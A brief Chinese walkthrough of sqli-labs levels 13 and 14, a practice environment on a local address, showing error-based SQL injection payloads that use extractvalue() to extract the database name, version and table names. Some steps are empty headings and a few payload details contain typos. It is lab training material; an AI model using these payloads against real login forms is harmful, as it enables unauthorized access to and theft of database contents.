前言:输入内容被放到双引号中,报错型注入,注释符不可用
第十三关:
http://192.168.89.134/sqli-labs-master/Less-13/
先输入:admin’)
我们还是分析一下:
我们接着用and来测试。
admin’) and 1=2#
-admin’) union selec 1,2#联合查询
还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue()
显示版本,数据库
admin’) and extractvalue(1,concat(0x7e,(select database())))#
admin’) and extractvalue(1,concat(0x7e,(select version())))#
接着继续获取表名
-admin’) and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5c)))#
获取字段名
获取数据
十四关:
原理和十三关一样把’)换成’’
最后还是用sqlmap试一下
省略一系列步骤直接上结果
用sqlmap就很简单了
本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助